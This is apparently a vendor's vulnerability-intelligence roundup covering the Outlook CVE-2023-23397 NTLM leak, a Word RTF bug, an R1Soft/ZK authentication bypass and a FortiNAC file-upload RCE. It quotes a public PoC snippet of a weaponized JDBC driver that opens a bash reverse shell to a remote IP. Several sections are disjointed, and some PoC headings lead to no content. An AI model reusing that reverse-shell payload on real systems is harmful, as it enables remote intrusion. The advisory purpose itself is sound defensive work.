cbeek-r7 (12)

Microsoft reported having been notified by Cert-UA of a zero-day vulnerability in Outlook. This vulnerability was observed to be used by nation-state actors targeting Ukraine’s government, military, energy, and transport sector during Mid-April and December 2022.

By sending malicious Outlook notes and tasks, the attackers were able to steal NTLM hashes via NTLM negotiation requests by forcing the targets’ devices to authenticate to attacker-controlled SMB shares. These obtained credentials were used for lateral movement within the victim’s networks.

Attackers are able to craft an email that contains an extended MAPI property called PidLidReminderFileParameter for either a calendar appointment, note or task. This property can contain a remote UNC path to an SMB (TCP port 445) share on a threat actor-controlled server. The malicious email does not require any user interaction and the vulnerability can be triggered without either reading the email or viewing the email in preview mode, the vulnerability will be triggered automatically when the Outlook client receives and processes the email. Upon processing the malicious email, Outlook will access the UNC path to the attacker-controlled SMB share, which allows an attacker to perform an NTLM relay attack and access other internal systems.

CVE-2023-23397 impacts all supported versions of Microsoft Outlook for Windows but doesn’t affect Outlook for Android, iOS, or macOS versions.
Outlook on the web and Microsoft 365 do not support NTLM authentication and are not vulnerable to CVE-2023-23397

A vulnerability in Microsoft’s Word wwlib allows attackers to get LCE with the privileges of the victim opens a malicious
RTF document. An attacker would be able to deliver this payload in several ways including as an attachment in spear-phishing attacks.

Affected Versions

This vulnerability affects at least the following versions of Microsoft Office:

• Microsoft Office 365 (Insider Preview – 2211 Build 15831.20122 CTR)
  
• Microsoft Office 2016 (Including Insider Slow – 1704 Build 8067.2032 CTR)
  
• Microsoft Office 2013
  
• Microsoft Office 2010
  
• Microsoft Office 2007
  

Acknowledgement

This issue was discovered, analyzed, and reported by Joshua J. Drake (@jduck).

PoC code from @jduck:

The “ZK” Framework is an open-source Java framework for building enterprise web and mobile applications. The R1Soft Server Backup Manager utilises. this framework.

By bypassing the authentication process, uploading a ‘custom and weaponized database driver (JDBC) that contains a payload for creating a remote shell on the device is possible. Excerpt from one of the public PoCs with a detail in the weaponized JDBC driver:

static {
    String winCmd = "dir";
    String linuxCmd = "bash -i >& /dev/tcp/192.168.1.0/2022 0>&1";

    String[] cmds = null;

    if (System.getProperty("os.name").toLowerCase().contains("win")) {
        cmds = new String[]{"cmd.exe", "/c", winCmd};
    } else {
        cmds = new String[]{"/bin/bash", "-c", linuxCmd};
    }

One of the Incident Response blogs in the referrals from Fox-IT mentions that activity since November 2022 has been observed where this software has been compromised and a backdoor is running on these systems.

Recent reports on ransomware actors’ activity in 2022 abusing vulnerabilities during their attacks marked this particular vulnerability as being used. Once inside the network of a victim, this particular vulnerability can be used to elevate privileges and execute code under administrative rights.

Fortinet’s researcher Gwendal Guégniaud discovered a RCE vulnerability on the Fortinet NAC (Network Access Control) device. The vulnerability in the keyUpload.jsp file, allows an unauthenticated attacker to write arbitrary files on the system. As a result, the uploaded code will be executed under the user rights of root.

Since these types of devices sit at the network perimeter of companies, it is an interesting target as we have observed in many ransomware attacks, where the initial attack starts compromising a network perimeter device.

With the release of a PoC by Horizon3ai, ShadowServer’s Honeypots has already reported scanning activity.
The exploit has been tested and works against vulnerable devices: